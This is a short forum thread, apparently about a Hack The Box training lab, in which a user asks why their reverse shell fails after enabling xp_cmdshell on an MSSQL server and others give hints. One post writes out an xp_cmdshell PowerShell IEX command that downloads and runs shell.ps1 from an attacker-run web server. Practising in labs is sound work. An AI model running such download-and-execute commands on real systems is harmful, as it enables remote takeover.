Stuck in Starting Point : Foothold

lgcarg · April 25, 2020, 4:46pm

I got the mssqlclient.py library installed and working, and could connect to the sql server instance and reconfigure it without issues. Now, the problem I’m having is that when I try to get instance to download and execute the reverse shell. It seems that it cannot connect to the server.

I created and saved the code of the shell in a file named shell.ps1. I raised the mini http web server and the netcat listener with the callback configurations.

But I’m stuck at the very last line:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"

n00biez · April 25, 2020, 5:38pm

Hint: the reverse shell code in shell.ps1 & the PowerShell CLI invocation are examples. You need to customize it to your own network environment.

Hope that helps. Good luck!

vinimmelo · April 25, 2020, 8:05pm

Type your comment> @n00biez said:

Hint: the reverse shell code in shell.ps1 & the PowerShell CLI invocation are examples. You need to customize it to your own network environment.

Hope that helps. Good luck!

That helps a lot man… for the first problem it is quite advanced, but after a few hours everything goes right, thanks.

lgcarg · April 25, 2020, 9:27pm

Thank you n00biez, it helped! thanks to that I managed to complete the starting point, tut. Cheers!